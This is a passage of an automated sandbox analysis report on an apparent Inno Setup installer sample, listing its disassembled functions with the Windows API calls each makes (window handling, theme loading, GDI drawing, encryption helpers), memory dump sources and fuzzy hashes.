                                                                          • Opcode Fuzzy Hash: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                                          • Instruction Fuzzy Hash: 5BF03071B0012087CB10AFAA9885B9673B8AB48305F5500BBBD05DF357C67CDC058768
                                                                          Function 00417CC6 Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 00417D07
                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D25
                                                                          • GetWindowPlacement.USER32(?,0000002C), ref: 00417D5B
                                                                          • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D82
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Placement$Iconic
                                                                          • String ID:
                                                                          • API String ID: 568898626-0
                                                                          • Opcode ID: 47b671fdedc35fdf98b71b51c82caa7697cc0af64fcddd8af6052c4a4d8e86ab
                                                                          • Instruction ID: 3daf342c44424aa5ce1366acdd2a80e82e5cfeaf10da0033b5167ac39e8fb95c
                                                                          • Opcode Fuzzy Hash: 47b671fdedc35fdf98b71b51c82caa7697cc0af64fcddd8af6052c4a4d8e86ab
                                                                          • Instruction Fuzzy Hash: BE017C31204108ABDB10EE69ECC1EE773A8AF59324F154166FE09CF242D638EC8087A8
                                                                          Function 00417590 Relevance: 3.0, APIs: 2, Instructions: 44windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CaptureIconic
                                                                          • String ID:
                                                                          • API String ID: 2277910766-0
                                                                          • Opcode ID: 9fb93b599f870259b4000da7575617f39aed9b1e5bccbb5d02bb51a51f71ab84
                                                                          • Instruction ID: 3321041a09622c131d5de1c426c5b9ba37bf97161ea704a377034d17a7c99502
                                                                          • Opcode Fuzzy Hash: 9fb93b599f870259b4000da7575617f39aed9b1e5bccbb5d02bb51a51f71ab84
                                                                          • Instruction Fuzzy Hash: 2EF0AF7230564157D7209B2EC984ABB62F69F88318B54483FE419CBB61EB78DCC08658
                                                                          Function 0042418C Relevance: 3.0, APIs: 2, Instructions: 22windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 00424193
                                                                            • Part of subcall function 00423A7C: EnumWindows.USER32(00423A14), ref: 00423AA0
                                                                            • Part of subcall function 00423A7C: GetWindow.USER32(?,00000003), ref: 00423AB5
                                                                            • Part of subcall function 00423A7C: GetWindowLongA.USER32(?,000000EC), ref: 00423AC4
                                                                            • Part of subcall function 00423A7C: SetWindowPos.USER32(00000000,TAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241A3,?,?,00423D6B), ref: 00423AFA
                                                                          • SetActiveWindow.USER32(?,?,?,00423D6B,00000000,00424154), ref: 004241A7
                                                                            • Part of subcall function 00423644: ShowWindow.USER32(00410648,00000009,?,00000000,0041ED9C,00423932,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 0042365F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                          • String ID:
                                                                          • API String ID: 2671590913-0
                                                                          • Opcode ID: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                                          • Instruction ID: 714e4cd20337d44954868cb88e5cd3c5f05620b237e6b6751f152470bbecd415
                                                                          • Opcode Fuzzy Hash: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                                          • Instruction Fuzzy Hash: 47E01AA070011087EB10AF69DCC9B9632A8BB4C304F5501BABD49CF25BD63CC8608728
                                                                          Function 004125D0 Relevance: 1.7, APIs: 1, Instructions: 188nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127CD), ref: 004127BB
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: NtdllProc_Window
                                                                          • String ID:
                                                                          • API String ID: 4255912815-0
                                                                          • Opcode ID: fadc627793d3d758d03d3b6288103bd692d15878d139e3b8876b7a5e98d728c0
                                                                          • Instruction ID: 515a926e27beec0aab385df702329c93692b8444378934293cf55fba5e442f36
                                                                          • Opcode Fuzzy Hash: fadc627793d3d758d03d3b6288103bd692d15878d139e3b8876b7a5e98d728c0
                                                                          • Instruction Fuzzy Hash: 4951F335304205CFD714DB6ADA8099BF3E5EF94314B2481ABD815C33A1D7B8ADA2CB48
                                                                          Function 00478554 Relevance: 1.6, APIs: 1, Instructions: 107nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004786A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: NtdllProc_Window
                                                                          • String ID:
                                                                          • API String ID: 4255912815-0
                                                                          • Opcode ID: 74fd435c634dc11c163aa08e5e8bd118cd21225c10192b8e8785eef0067adbbd
                                                                          • Instruction ID: b7c0c70f2a783e09ad8744fe0b8a2eb923ce1fb3c3bfc7260a93e3bfca3db08f
                                                                          • Opcode Fuzzy Hash: 74fd435c634dc11c163aa08e5e8bd118cd21225c10192b8e8785eef0067adbbd
                                                                          • Instruction Fuzzy Hash: 1C416875604104EFCB10CF99C6888AAB7F5FB48311B24C99AE80CEB701DB38EE41DB95
                                                                          Function 0045D05C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045D067
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CryptFour
                                                                          • String ID:
                                                                          • API String ID: 2153018856-0
                                                                          • Opcode ID: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                                          • Instruction ID: 2e238a974be0c8424367b3c35ccc205e7f0a308c5ec670be841bb4718b7179ff
                                                                          • Opcode Fuzzy Hash: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                                          • Instruction Fuzzy Hash: 37C09BF200420CBF660057D5ECC9C77B75CF6586547508126F6048210195726C104574
                                                                          Function 0045D074 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046D934,?,0046DB15), ref: 0045D07A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CryptFour
                                                                          • String ID:
                                                                          • API String ID: 2153018856-0
                                                                          • Opcode ID: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                                          • Instruction ID: 227689971defb3a768f182aa15824e3680876923b4d994b81e1676941902ce31
                                                                          • Opcode Fuzzy Hash: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                                          • Instruction Fuzzy Hash: 9DA002B0A80300BAFD2057B05D4EF26352CA7D0F05F708465B202EA0D085A56410852C
                                                                          Function 10001130 Relevance: .1, Instructions: 55COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2938609988.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000001.00000002.2938592656.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2938626837.0000000010002000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_10000000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                          • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                          • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                          • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                          Function 10001000 Relevance: .0, Instructions: 2COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2938609988.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000001.00000002.2938592656.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2938626837.0000000010002000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_10000000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                          • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                          • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                          • Instruction Fuzzy Hash:
                                                                          Function 0044B650 Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 252libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0044B5FC: GetVersionExA.KERNEL32(00000094), ref: 0044B619
                                                                          • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F76D,004980FE), ref: 0044B677
                                                                          • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B68F
                                                                          • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A1
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6B3
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6C5
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6D7
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6E9
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B6FB
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B70D
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B71F
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B731
                                                                          • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B743
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B755
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B767
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B779
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B78B
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B79D
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7AF
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C1
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7D3
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7E5
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7F7
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B809
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B81B
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B82D
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B83F
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B851
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B863
                                                                          • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B875
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B887
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B899
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8AB
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8BD
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8CF
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E1
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8F3
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B905
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B917
                                                                          • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B929
                                                                          • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B93B
                                                                          • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B94D
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B95F
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B971
                                                                          • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B983
                                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B995
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9A7
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9B9
                                                                          • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9CB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$LibraryLoadVersion
                                                                          • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                          • API String ID: 1968650500-2910565190
                                                                          • Opcode ID: 6c67b19e24951571b37bf4c203fa1685e3d140177509ee69aad76801aa2bc0fe
                                                                          • Instruction ID: 77cdb2a24b144e98dd8fe0af3c477b00202e10f27d636664339925e4e96e780e
                                                                          • Opcode Fuzzy Hash: 6c67b19e24951571b37bf4c203fa1685e3d140177509ee69aad76801aa2bc0fe
                                                                          • Instruction Fuzzy Hash: 679198F0A40B11EBEB00AFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
                                                                          Function 0041CA04 Relevance: 33.2, APIs: 22, Instructions: 213windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • 73A1A570.USER32(00000000,?,0041A93C,?), ref: 0041CA38
                                                                          • 73A24C40.GDI32(?,00000000,?,0041A93C,?), ref: 0041CA44
                                                                          • 73A26180.GDI32(0041A93C,?,00000001,00000001,00000000,00000000,0041CC5A,?,?,00000000,?,0041A93C,?), ref: 0041CA68
                                                                          • 73A24C00.GDI32(?,0041A93C,?,00000000,0041CC5A,?,?,00000000,?,0041A93C,?), ref: 0041CA78
                                                                          • SelectObject.GDI32(0041CE34,00000000), ref: 0041CA93
                                                                          • FillRect.USER32(0041CE34,?,?), ref: 0041CACE
                                                                          • SetTextColor.GDI32(0041CE34,00000000), ref: 0041CAE3
                                                                          • SetBkColor.GDI32(0041CE34,00000000), ref: 0041CAFA
                                                                          • PatBlt.GDI32(0041CE34,00000000,00000000,0041A93C,?,00FF0062), ref: 0041CB10
                                                                          • 73A24C40.GDI32(?,00000000,0041CC13,?,0041CE34,00000000,?,0041A93C,?,00000000,0041CC5A,?,?,00000000,?,0041A93C), ref: 0041CB23
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041CB54
                                                                          • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13,?,0041CE34,00000000,?,0041A93C), ref: 0041CB6C
                                                                          • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13,?,0041CE34,00000000,?), ref: 0041CB75
                                                                          • 73A18830.GDI32(0041CE34,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13), ref: 0041CB84
                                                                          • 73A122A0.GDI32(0041CE34,0041CE34,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13), ref: 0041CB8D
                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041CBA6
                                                                          • SetBkColor.GDI32(00000000,00000000), ref: 0041CBBD
                                                                          • 73A24D40.GDI32(0041CE34,00000000,00000000,0041A93C,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC02,?,?,00000000), ref: 0041CBD9
                                                                          • SelectObject.GDI32(00000000,?), ref: 0041CBE6
                                                                          • DeleteDC.GDI32(00000000), ref: 0041CBFC
                                                                            • Part of subcall function 0041A050: GetSysColor.USER32(?), ref: 0041A05A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Color$ObjectSelect$A122A18830Text$A26180A570DeleteFillRect
                                                                          • String ID:
                                                                          • API String ID: 1381628555-0
                                                                          • Opcode ID: dd52d12a6b024fa5c35df86d1f57249e44ceff71b775bbbb3271d9076c63cc1d
                                                                          • Instruction ID: 82b5d3b79294c4079cc38f46940f8a3e5246528c32e36f15c424f6ef30e38055
                                                                          • Opcode Fuzzy Hash: dd52d12a6b024fa5c35df86d1f57249e44ceff71b775bbbb3271d9076c63cc1d
                                                                          • Instruction Fuzzy Hash: 0061F071A44608AFDB10EBE5DC86FEFB7B8EB48704F10446AB504E7281D67CA9508B69
                                                                          Function 004978DC Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 251synchronizationCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ShowWindow.USER32(?,00000005,00000000,00497C74,?,?,00000000,?,00000000,00000000,?,0049802B,00000000,00498035,?,00000000), ref: 0049795F
                                                                          • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00497C74,?,?,00000000,?,00000000,00000000,?,0049802B,00000000), ref: 00497972
                                                                          • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00497C74,?,?,00000000,?,00000000,00000000), ref: 00497982
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004979A3
                                                                          • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00497C74,?,?,00000000,?,00000000), ref: 004979B3
                                                                            • Part of subcall function 0042D444: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4D2,?,?,?,00000001,?,00456052,00000000,004560BA), ref: 0042D479
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                          • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                          • API String ID: 2000705611-3672972446
                                                                          • Opcode ID: 2045753806e23fd6e9fea4bee8d30805ced8101e67e5ade90995f0c82b8a892a
                                                                          • Instruction ID: f92775941c35c4987ffcee83f2591dcd2e8f64eb72217f5dcf8b9acaa4e0c6bb
                                                                          • Opcode Fuzzy Hash: 2045753806e23fd6e9fea4bee8d30805ced8101e67e5ade90995f0c82b8a892a
                                                                          • Instruction Fuzzy Hash: 3E91D7306182449FDF11EBA5C856BAE7BF4EB49308F5184B7F500A7392D67CAC05CB19
                                                                          Function 0045A4F8 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 209COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,0045A7B4,?,?,?,?,?,00000006,?,00000000,00496D69,?,00000000,00496E0C), ref: 0045A666
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
